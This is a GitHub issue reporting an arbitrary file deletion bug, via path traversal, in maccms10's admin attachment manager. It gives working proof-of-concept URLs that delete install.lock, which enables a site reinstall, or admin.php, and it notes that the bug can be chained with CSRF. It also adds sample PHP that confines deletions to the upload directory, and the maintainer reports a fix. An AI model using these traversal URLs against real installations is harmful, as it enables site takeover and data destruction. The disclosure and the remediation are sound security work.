Any file can be deleted in the background #79

Closed
1979139113 opened this issue Oct 22, 2019 · 1 comment

1979139113 commented Oct 22, 2019

In "Super Console -> Basic -> Attachment Management" (超级控制台->基础->附件管理), the delete function can delete any file, including /application/data/install/install.lock.

After the administrator has logged in, open the following link.

http://127.0.0.1/maccms10/admin.php/admin/images/del.html?ids%5B%5D=/upload/../application/data/install/install.lock

The file install.lock will be deleted.

Then visit install.php

This can reinstall the entire site.

Delete admin.php:

http://127.0.0.1/maccms10/admin.php/admin/images/del.html?ids%5B%5D=/upload/../admin.php

In general, it can be used with CSRF vulnerabilities to delete arbitrary files.
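
Added example (not part of the issue and not maccms10's own code): one way a delete handler can confine the `ids[]` values from the report to the upload directory, by resolving each path and comparing it against the resolved upload root. The function name `resolve_upload_path` and the temporary site tree are assumptions constructed for illustration.

```php
<?php
// Added example; resolve_upload_path() is a hypothetical helper, not maccms10 code.

/** Return the real path of $requested only if it is a file inside <siteRoot>/upload. */
function resolve_upload_path(string $siteRoot, string $requested): ?string
{
    $uploadRoot = realpath($siteRoot . DIRECTORY_SEPARATOR . 'upload');
    if ($uploadRoot === false || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks; it returns false for missing files.
    $real = realpath($siteRoot . DIRECTORY_SEPARATOR . ltrim($requested, '/\\'));
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Compare with a trailing separator so "/upload_old" does not pass as "/upload".
    $prefix = $uploadRoot . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed site tree in a temp directory so the example runs offline.
$site = sys_get_temp_dir() . '/site_' . bin2hex(random_bytes(4));
mkdir("$site/upload/vod", 0700, true);
mkdir("$site/application/data/install", 0700, true);
file_put_contents("$site/upload/vod/poster.jpg", 'x');
file_put_contents("$site/application/data/install/install.lock", 'x');
file_put_contents("$site/admin.php", '<?php');

// First value is a legitimate attachment; the other two are the ids from the report.
$ids = [
    '/upload/vod/poster.jpg',
    '/upload/../application/data/install/install.lock',
    '/upload/../admin.php',
];
foreach ($ids as $id) {
    $target = resolve_upload_path($site, $id);
    if ($target === null) {
        echo "refused: $id\n";   // resolves outside upload/, nothing is deleted
        continue;
    }
    unlink($target);
    echo "deleted: $id\n";
}
```

Path confinement alone does not address the CSRF point above: the delete action is reachable with a plain GET link, so it also needs to accept only POST requests carrying an anti-CSRF token.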

magicblack (Owner) commented

Fixed~ Waiting for the release.
